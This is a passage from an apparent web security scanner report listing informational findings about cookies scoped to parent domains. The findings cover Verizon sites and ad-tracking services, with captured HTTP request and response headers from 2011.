Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: ACID=tX790013123977920032; C2=q62YOBbfC0zjGQQhrCQcHW0uSKsBdbdBGbAmoZgxi+iBeziBGnLuHYRxGwakAfwuRX4q0utBT7qhZB2IzaYWhahBdPiBGjpDAcHvG4EA7xrBOpKPGEIZGa8kffQucX8+5CHCqQsBwB; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWBy9PJ2LmBlN7oYv/UGD8fTZymi5p62qGFtxbh1N7D1juUqtDBKghlDCoK!; ROLL=fvAr20olF+7f08J!; aceRTB=rm%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Cam%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Cdc%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Can%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Crub%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7C; GUID=MTMxNTEzOTI0MjsxOjE3Mmpta2gxN2cxMHJzOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: https://ad.yieldmanager.com/pixel?id=357067&t=2
Set-Cookie: C2=OnUZOBbfB0zjG7ZhrCQcHWgVSKsBdbdxgZAmoZMYi+iBezixglLuHYRxGbUkAfwuRXkR0udBT7qR0/1IzaE9hahBdPixgFbPIsOlGAnq8YQgkZUYT+9B5ydhWmLcIoCxGrA; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/
Set-Cookie: GUID=MTMxNTI2MDg3ODsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 05 Sep 2011 23:14:38 GMT
Content-Length: 0


14.52. https://mblogin.verizonwireless.com/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mblogin.verizonwireless.com
Path:   /amserver/UI/Login

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: mblogin.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:31 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-11
Am_client_type: genericHTML
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: SD=CARTCTR%3D0;Domain=.verizonwireless.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close
Content-Length: 18685


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script type="text/j
...[SNIP]...

14.53. http://media.verizon.com/media/XmlProxy.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.verizon.com
Path:   /media/XmlProxy.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/XmlProxy.ashx?widget=vzMedia&callback=?&_rand=1315280536004 HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://media.verizon.com/media/widgets/sliderdev/flash/MyVerizonListSliderNoDropDown.swf?version=4&_rand=1315280536005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml
Content-Length: 73898
Date: Mon, 05 Sep 2011 22:42:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=KQfyhK9qeUc=&H=&I=&J=JxCF029RF/U=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:50 GMT; path=/media

...<?xml version="1.0" encoding="utf-8"?>
<Response creationDate="9/5/2011 6:01:02 AM">
<Results>
<Group id="VZMediaDefault" entitlement="HBO,Starz Play,Showtime,ABC Sneak Peeks,Smithsonian C
...[SNIP]...

14.54. http://media.verizon.com/media/scripts/widget.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.verizon.com
Path:   /media/scripts/widget.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/scripts/widget.ashx?widget=vzNews&container=vzNewsWidget HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 143025
Date: Mon, 05 Sep 2011 22:41:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:23 GMT; path=/media

/* widget.ashx code generated : 9/5/2011 10:41:23 PM; valid until: 9/5/2011 5:42:21 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = false;

/* files consolidated
...[SNIP]...

14.55. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=101633&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1315139242; mt_mop=10008:1315139190|2:1315139242|5:1315061038|4:1313678521|10001:1312768945|10002:1313678517

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6809 26633
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 05 Sep 2011 22:14:39 GMT
Connection: Keep-Alive
Set-Cookie: ts=1315260879; domain=.mathtag.com; path=/; expires=Tue, 04-Sep-2012 22:14:39 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.56. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?&b2=zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g&jsb=1&cid=&rnd=0.3133519586570117 HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Sat, 03-Mar-2012 22:14:41 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 22:14:40 GMT

GIF89a.............!.......,...........D..;

14.57. http://s.xp1.ru4.com/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=17345346&_g=17345335&_a=17344945&_p=1621613&_s=0&_pm=17344948&_pn=2&_pl=0&redirect=http://s.xp1.ru4.com/images/pixel.gif HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:19:21 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
X-Cnection: close
Pragma: no-cache
Set-cookie: X1ID=BC-00000000964218310; domain=.ru4.com; path=/; expires=Mon, 05-Mar-2013 18:19:21 GMT
Set-cookie: O15772=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Location: http://s.xp1.ru4.com/images/pixel.gif
Content-length: 0


14.58. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=15772&_t=behavioral&ssv_002=tv HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:18:40 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 997910-B997917=0|0|0|0|0|997915|997914|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 26
X-Cnection: close

var xp1_behavioral = true;

14.59. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=15772&_t=ghp&ssv_random=27&ssv_callback=SetXP1Placements&ssv_003=&ssv_004=&ssv_005=&ssv_006=&ssv_007=&ssv_008=&ssv_009=&ssv_010=&ssv_011=&ssv_012=0&ssv_013=0&ssv_014=807&ssv_015=&ssv_016= HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/
Set-cookie: P15772=; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1487
X-Cnection: close

SetXP1Placements({
"xp1_placement1": {
"creativeID": "GHP_OT_HSIDL3M_DEF",
"clickURL": "http://s.xp1.ru4.com/click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=0
...[SNIP]...

14.60. http://sales.liveperson.net/hc/2329305/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2329305/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2329305/?&site=2329305&cmd=mTagStartPage&lpCallId=262428231537-506367190275&protV=20&lpjson=1&page=http%3A//www.verizonbusiness.com/Medium/&id=1569842908&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-verizon-medium-english&activePlugin=none&cobrowse=true&PV%21unit=verizon-medium&PV%21Section=Home&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21CountrySelected=xg&title=Home%20-%20Verizon%20Medium%20Business&referrer=http%3A//www22.verizon.com/content/verizonglobalhome/ghp_business.aspx&cobrowse=true&cookie=BERT%3DVRID%253d6e76b61a-0caa-4f5d-9d01-7a634d977972%7CVTID%253de8396f11-b89c-4b23-a26b-edc20acf7fae%7CSX%253d1315262200%7CVP%253d1%7CRMC%253dxg%7CLP%253den%3B%20__utma%3D58777642.1910521591.1315279004.1315279004.1315279004.1%3B%20__utmb%3D58777642.2.10.1315279004%3B%20__utmc%3D58777642%3B%20__utmz%3D58777642.1315279004.1.1.utmcsr%3Dwww22.verizon.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/content/verizonglobalhome/ghp_business.aspx HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7744157426393992956; LivePersonID=-5110247826455-1315261003:-1:-1:-1:-1; HumanClickSiteContainerID_2329305=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; HumanClickACTIVE=1315261005680

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315261011:0; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net
Set-Cookie: HumanClickKEY=5729159524233474328; path=/hc/2329305
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-5110247826455-1315261011:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:16:51 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"262428231537-506367190275","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

14.61. http://sales.liveperson.net/hc/2329305/cmd/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2329305/cmd/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/2329305/cmd/url/?site=2329305&SV!click-query-name=chat-sb_com-sales-english-2&SV!click-query-room=chat-sb_com-sales-english-2&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//sales.liveperson.net/hc/2329305/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D2329305%26SV%21chat-button-name%3Dchat-sb_com-sales-english-2%26SV%21chat-button-room%3Dchat-sb_com-sales-english-2%26referrer%3D%28button%2520dynamic-button%3Achat-sb_com-sales-english-2%28Business%2520Phone%2520Plans%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Service%2520%257C%2520Verizon%2520Voice%29%29%2520http%253A//smallbusiness.verizon.com/products/voice/plans.aspx&id=1535582035&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1315279372239 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7744157426393992956; LivePersonID=-5110247826455-1315261003:-1:1315261074:-1:-1; HumanClickSiteContainerID_2329305=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; ASPSESSIONIDSQDBATSC=LPFNAFOBBADLNADJGJPHJDMH; HumanClickACTIVE=1315261349848

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Sep 2011 22:23:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-5110247826455-1315261003:-1:1315261074:-1:-1; expires=Tue, 04-Sep-2012 22:23:18 GMT; path=/hc/2329305; domain=.liveperson.net
Location: http://sales.liveperson.net/hc/2329305/?cmd=file&file=visitorWantsToChat&site=2329305&SV!chat-button-name=chat-sb_com-sales-english-2&SV!chat-button-room=chat-sb_com-sales-english-2&referrer=(button%20dynamic-button:chat-sb_com-sales-english-2(Business%20Phone%20Plans%20%7C%20Local%20%26%20Long%20Distance%20Service%20%7C%20Verizon%20Voice))%20http%3A//smallbusiness.verizon.com/products/voice/plans.aspx
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


14.62. http://sales.liveperson.net/hc/44153975/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/44153975/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/44153975/?lpCallId=588965299046-84969359642&protV=20&lpjson=1&site=44153975&cmd=mTagInPage&page=http%3A//www.verizonwireless.com/b2c/promotion/specialoffers.jsp&id=6680413031&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-generic-consumer-english&activePlugin=none&cobrowse=true&cookie=GLOBALID%3DtWRJzfV%252FzyamDVoURNGmO7smtgitROzrsjFa48jF8jyYMlJxx5Bllp8fvpJxcQO4%3B%20%20mbox%3Dcheck%23true%231315278966%7Csession%231315278871714-190238%231315280766%7CPC%231315278871714-190238.19%231316488506%3B%20gnVersion%3D2011Jul31030844%3B%20CP%3Dnull* HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: HumanClickKEY=4768142437206261315; LivePersonID=-546022977410-1315260925:-1:-1:-1:-1; HumanClickSiteContainerID_44153975=Secondary3; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1315260923432

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
